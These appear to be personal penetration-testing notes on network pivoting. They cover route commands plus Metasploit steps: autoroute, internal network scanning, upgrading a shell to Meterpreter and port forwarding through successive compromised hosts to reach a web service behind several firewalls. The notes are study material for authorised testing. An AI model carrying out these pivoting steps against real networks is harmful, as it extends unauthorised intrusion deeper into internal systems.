💻Networking

routing and other important networking concepts regarding PenTesting

Routing

get route table:

ip route
route -n

add a route

ip route add <net_id>/<mask> via <net_getaway>

meterpreter:

route add x.x.x.0/24 1 (this is the session you want this to add to)
route list
//You should see the route now.

//Then go back into your session by:
sessions -i 1

Pivoting | Offensive Security

I followed this guide then portfwd add for whatever port I found

use auxilary/scanner/discovery/udp_prob
set RHOSTS <target_ip>

route add <target_ip>/24 1  //routing inside the seesion so it will send these udp probs following this routing rule
route print

set THREADS 20  //20 hosts at the same time
run

inside a meterpreter session:

meterpreter> run autoroute -s <new_ip_found_inside_target>/24
meterpreter > run autoroute -p //print all routes

//now the routing is down inside a metasploite so lets scan the network using it
background
use auxiliary/scanner/netbios/nbname   //for win env

set RHOSTS <new_net_ip>/24
run

// found a new ip time for port scanner for the new target
 use auxiliary/scanner/portscan/tcp
 set RHOSTS <new_TRAGET_Discovered_using_first_target_IP>
 set THREADS 5
 run
 
//then use another auxiliary to discover the ver for the specified deamon found
//ex:ftp

use auxiliary/scanner/ftp/ftp_version
st RHOSTS <new_TRAGET_Discovered_IP>
run

//then you can search for an exploit for that ftp banner
//then you would pobably get shell you can use to_meterpreter module

use post/multi/manage/shell_to_meterpreter
set LHOST <first_target_in_new_net_IP>
set session <shell_session_id>
run

//now you have a new session it's the meterpreter
session -i <new_meter_sessoin>

//then repeat the same thing with the new session
meterpreter> autoroute -s <2nd_target_ip_net>/24
background

route print

//assuming the 2nd target connected to
// a 3rd target that runs ion TCP:80
//you found the 3rd target 
//by repeating steps above inside the 2nd target.

session -i <2nd_target_sesssion_id>
meterpreter > portfwd add -l 8888 -p 80 <third_target_ip>

//now you device can connect to 3rd target webapp 
//(whichs was behind 3 FireWalls) 

now inside your machine:
netstat -altp

will give you will see 0.0.0.0:8888 listening on ruby

metasploit-framework/shell_to_meterpreter.md at master · rapid7/metasploit-frameworkGitHub

upgrade a shell to meterperter over pivot

Pivoting via Meterpreter [metasploit v6.x]